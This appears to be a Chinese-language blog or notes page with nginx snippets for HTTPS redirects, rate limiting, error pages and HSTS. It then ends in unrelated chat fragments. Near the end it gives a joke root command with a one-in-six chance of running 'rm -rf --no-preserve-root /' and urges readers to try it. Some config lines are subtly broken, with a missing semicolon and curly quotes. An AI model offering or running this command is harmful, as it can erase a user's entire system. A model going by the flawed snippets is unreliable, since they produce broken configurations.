http跳https

if ($scheme = http)
    {
    return 301 https://$host$request_uri
    }

或者按条件rewrite

限制流量

location / {
    limit_rate_after 3m;
    limit_rate 512K;
    limit_conn  one 1;
}

返回http状态码

error_page 497  https://$host$uri?$args;
error_page 404 = /404.php;

为什么要启用HSTS

如果一个 web 服务器支持 HTTP 访问,并将其重定向到 HTTPS 访问的话,那么访问者在重定向前的初始会话是非加密的。举个例子,比如访问者输入 http://www.foo.com/ 或直接输入 foo.com 时。这就给了中间人攻击的一个机会,重定向可能会被破坏,从而定向到一个恶意站点而不是应该访问的加密页面。HTTP 严格传输安全(HSTS)功能使 Web 服务器告知浏览器绝不使用 HTTP 访问,在浏览器端自动将所有到该站点的 HTTP 访问替换为 HTTPS 访问。

示例

server {
listen xxxx:443 ssl;
server_name www.example.com;
add_header Strict-Transport-Security “max-age=31536000;includeSubdomains;preload”;
….
}
server {
listen xxxx:80;
server_name www.example.com;
return 301 https://www.example.com$request_uri;

}

from

https://blog.52miku.cn/tech/933
https://linux.cn/article-5266-1.html

su -c '[ $[$RANDOM % 6] == 0 ] && rm -rf --no-preserve-root / || echo "Lucky Boy"'

试试?

b82e4851ly1fmf79vpmymj20i20oxdw9.jpg

还在么

现在在了

之前你怎么不在

现在我在,你还在么

在么.jpeg